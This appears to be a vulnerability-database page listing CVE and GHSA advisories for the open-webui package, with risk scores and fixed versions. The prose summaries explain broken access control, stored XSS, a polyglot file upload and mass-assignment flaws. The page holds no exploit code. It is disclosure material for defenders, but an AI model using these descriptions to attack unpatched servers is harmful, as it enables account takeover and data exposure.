http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-45331, GHSA-4v7r-f4w8-8972
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-rhhj-rccv-87hw |
|
| 45 |
| url |
VCID-s625-eg1w-gfd1 |
| vulnerability_id |
VCID-s625-eg1w-gfd1 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /api/generate, /api/embed, /api/embeddings, and /api/show endpoints accept any model name from the user and forward the request to the Ollama backend without checking whether the user is authorized to access that model. These endpoints only require get_verified_user (any authenticated non-pending user) and validate that the model exists in the full unfiltered model list, but never check AccessGrants.has_access(). This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44563, GHSA-rcvp-6fgw-c7fh
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-s625-eg1w-gfd1 |
|
| 46 |
| url |
VCID-t571-d65a-cyb2 |
| vulnerability_id |
VCID-t571-d65a-cyb2 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, he LDAP and OAuth authentication flows use a TOCTOU (Time-of-Check-Time-of-Use) pattern for first-user admin role assignment. The regular signup handler (signup_handler in auths.py, line 663) was explicitly patched to prevent this race with the comment "Insert with default role first to avoid TOCTOU race", but the LDAP and OAuth code paths were never updated with the same fix. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-45675, GHSA-h3ww-q6xx-w7x3
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-t571-d65a-cyb2 |
|
| 47 |
| url |
VCID-u25g-p4nx-gqd1 |
| vulnerability_id |
VCID-u25g-p4nx-gqd1 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can overwrite any file's content by ID through the `POST /api/v1/retrieval/process/files/batch` endpoint. The endpoint performs no ownership check, so a regular user with read access to a shared knowledge base can obtain file UUIDs via `GET /api/v1/knowledge/{id}/files` and then overwrite those files, escalating from read to write. The overwritten content is served to the LLM via RAG, meaning the attacker controls what the model tells other users. Version 0.8.6 patches the issue. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.6 |
| purl |
pkg:pypi/open-webui@0.8.6 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 13 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 14 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 15 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 16 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 17 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 18 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 19 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 20 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 21 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 22 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 23 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 24 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 25 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 26 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 27 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 28 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 29 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 30 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 31 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 32 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 33 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 34 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 35 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 36 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 37 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 38 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 39 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 40 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 41 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 42 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6 |
|
|
| aliases |
CVE-2026-28788, GHSA-jjp7-g2jw-wh3j
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-u25g-p4nx-gqd1 |
|
| 48 |
| url |
VCID-ujye-g4rj-8be5 |
| vulnerability_id |
VCID-ujye-g4rj-8be5 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.6, in standard channels (i.e., channels whose channel.type is neither group nor dm), the endpoint POST /api/v1/channels/{channel_id}/messages/{message_id}/update can be accessed with read permission only. When access_control is set to None, the authorization check has_access(..., type="read") evaluates to True, allowing users who are not the message owner to update messages. As a result, unauthorized modification of other users’ messages is possible. This vulnerability is fixed in 0.8.6. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.6 |
| purl |
pkg:pypi/open-webui@0.8.6 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 13 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 14 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 15 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 16 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 17 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 18 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 19 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 20 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 21 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 22 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 23 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 24 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 25 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 26 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 27 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 28 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 29 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 30 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 31 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 32 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 33 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 34 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 35 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 36 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 37 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 38 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 39 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 40 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 41 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 42 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6 |
|
|
| aliases |
CVE-2026-44571, GHSA-jgj3-r8hr-9pjw
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ujye-g4rj-8be5 |
|
| 49 |
| url |
VCID-um53-kf7u-kkg6 |
| vulnerability_id |
VCID-um53-kf7u-kkg6 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.11, there is a broken access control vulnerability in tool values. This issue has been patched in version 0.8.11. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.11 |
| purl |
pkg:pypi/open-webui@0.8.11 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 13 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 14 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 15 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 16 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 17 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 18 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 19 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 20 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 21 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 22 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 23 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 24 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 25 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 26 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 27 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 28 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 29 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 30 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 31 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 32 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 33 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 34 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 35 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 36 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 37 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 38 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.11 |
|
|
| aliases |
CVE-2026-34222, GHSA-7429-hxcv-268m
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-um53-kf7u-kkg6 |
|
| 50 |
| url |
VCID-vghe-uuzj-m7cu |
| vulnerability_id |
VCID-vghe-uuzj-m7cu |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the AccountPending.svelte component renders the admin-configured "Pending User Overlay Content" using marked.parse() inside {@html} with an incorrect DOMPurify application order. An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44568, GHSA-fq3v-xjjx-95rc
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-vghe-uuzj-m7cu |
|
| 51 |
| url |
VCID-vkx3-71kv-sugt |
| vulnerability_id |
VCID-vkx3-71kv-sugt |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, Open WebUI supports model composition via base_model_id: a user-defined model (e.g., "Cheap Assistant") can reference an existing base model (e.g., "gpt-4-turbo-restricted") that provides the actual inference capability. When a user queries the composed model, the access control pipeline verifies the user has access to the composed model but never re-verifies access to the chained base model. Additionally, the model creation and import endpoints accept arbitrary base_model_id values without checking that the caller has access to that base model. Combined, this allows any user with the default model creation permission to create a model that chains to a restricted base model — and then invoke it, causing the server to dispatch the request to the restricted base model using the admin-configured API key. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44555, GHSA-9vvh-qmjx-p4q8
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-vkx3-71kv-sugt |
|
| 52 |
| url |
VCID-w2vd-r3hr-w3bt |
| vulnerability_id |
VCID-w2vd-r3hr-w3bt |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a stored cross-site scripting (XSS) vulnerability that allows any authenticated user with model creation permission (workspace.models) to execute arbitrary JavaScript in the browser of any other user (including admins) who views the malicious model in the chat UI. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44721, GHSA-gf5m-wcrh-7928
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-w2vd-r3hr-w3bt |
|
| 53 |
| url |
VCID-wb88-83cj-ffhy |
| vulnerability_id |
VCID-wb88-83cj-ffhy |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.9, when a regular user [non-admin] logs into the application, a http://IP:8080/api/models? web request is initiated by the application and in response, it reveals the system prompt of available models set by admin on models pages in workspace affecting the confidentiality of application. This vulnerability is fixed in 0.8.9. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.9 |
| purl |
pkg:pypi/open-webui@0.8.9 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 13 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 14 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 15 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 16 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 17 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 18 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 19 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 20 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 21 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 22 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 23 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 24 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 25 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 26 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 27 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 28 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 29 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 30 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 31 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 32 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 33 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 34 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 35 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 36 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 37 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 38 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 39 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 40 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 41 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.9 |
|
|
| aliases |
CVE-2026-45351, GHSA-jh9g-8jqw-m2qx
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-wb88-83cj-ffhy |
|
| 54 |
| url |
VCID-wcz4-vwx4-tufb |
| vulnerability_id |
VCID-wcz4-vwx4-tufb |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHE_DIR/audio/transcriptions/.. The /cache/{path} route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no Content-Disposition. A verified user with the default-on chat.stt permission can upload a polyglot WAV+HTML file named pwn.html and trick any other user into opening the resulting URL — the response comes back as text/html and any embedded <script> runs in the Open WebUI origin. This vulnerability is fixed in 0.9.3. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45315, GHSA-m8f9-9whg-f4xr
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-wcz4-vwx4-tufb |
|
| 55 |
| url |
VCID-yug9-shts-kufb |
| vulnerability_id |
VCID-yug9-shts-kufb |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra='allow'). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45396, GHSA-rjmp-vjf2-qf4g
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-yug9-shts-kufb |
|
| 56 |
| url |
VCID-yysb-dk2k-f7g4 |
| vulnerability_id |
VCID-yysb-dk2k-f7g4 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, administrative role changes and user deletions do not iterate SESSION_POOL to disconnect affected sessions. As a result, a user whose admin role has been revoked retains admin privileges within their existing Socket.IO session for as long as they keep the connection alive (via automatic heartbeats). The gap is exclusive to the Socket.IO session cache. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
